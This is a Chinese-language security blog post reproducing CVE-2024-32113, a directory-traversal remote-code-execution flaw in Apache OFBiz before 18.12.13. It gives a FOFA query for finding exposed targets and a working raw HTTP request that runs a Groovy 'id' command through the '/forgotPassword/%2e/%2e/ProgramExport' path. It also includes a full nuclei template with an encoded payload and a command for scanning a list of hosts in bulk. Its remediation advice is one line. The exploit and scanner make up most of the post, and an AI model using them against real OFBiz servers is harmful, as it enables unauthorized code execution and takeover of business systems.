CVE-2024-32113 漏洞复现(附POC)

admin 2024年6月18日12:25:21评论69 views字数 2086阅读6分57秒阅读模式

使

01

漏洞名称

Apache OFBiz 目录遍历致代码执行漏洞

02

漏洞影响

Apache OFBiz  18.12.13之前的版本

03

漏洞描述

Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。2024年5月,官方发布新版本修复了CVE-2024-32113 Apache OFBiz 目录遍历致代码执行漏洞,攻击者可构造恶意请求控制服务器。建议尽快修复漏洞。

04

FOFA搜索语句
app="Apache_OFBiz"

CVE-2024-32113 漏洞复现(附POC)

05

漏洞复现

向靶场发送如下数据包,在靶场上执行id命令

POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0Connection: closeContent-Length: 55Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipgroovyProgram=throw+new+Exception('id'.execute().text);

响应内容如下

CVE-2024-32113 漏洞复现(附POC)

漏洞复现成功

06

批量漏洞扫描 poc

nuclei poc文件内容如下

id: CVE-2024-32113info:  name: Apache OFBiz Directory Traversal - Remote Code Execution  author: DhiyaneshDK  severity: high  description: |    Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13  remediation: |    Users are recommended to upgrade to version 18.12.13, which fixes the issue.  reference:    - https://issues.apache.org/jira/browse/OFBIZ-13006    - https://lists.apache.org/thread/w6s60okgkxp2th1sr8vx0ndmgk68fqrd    - https://ofbiz.apache.org/download.html    - https://ofbiz.apache.org/security.html    - https://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit    - https://nvd.nist.gov/vuln/detail/CVE-2024-32113  classification:    cve-id: CVE-2024-32113    epss-score: 0.00115    epss-percentile: 0.45112  metadata:    verified: true    max-request: 1    fofa-query: app="Apache_OFBiz"  tags: cve,cve2024,apache,obiz,rcehttp:  - raw:      - |        POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1        Host: {{Hostname}}        Content-Type: application/x-www-form-urlencoded        groovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);    matchers-condition: and    matchers:      - type: regex        part: body        regex:          - "java.lang.Exception:"          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"        condition: and      - type: status        status:          - 200

运行POC

nuclei.exe -t CVE-2024-32113.yaml -l 1.txt

CVE-2024-32113 漏洞复现(附POC)

07

修复建议

请尽快升级到安全版本。

原文始发于微信公众号(AI与网安):CVE-2024-32113 漏洞复现(附POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月18日12:25:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-32113 漏洞复现(附POC)https://cn-sec.com/archives/2859961.html

发表评论

匿名网友 填写信息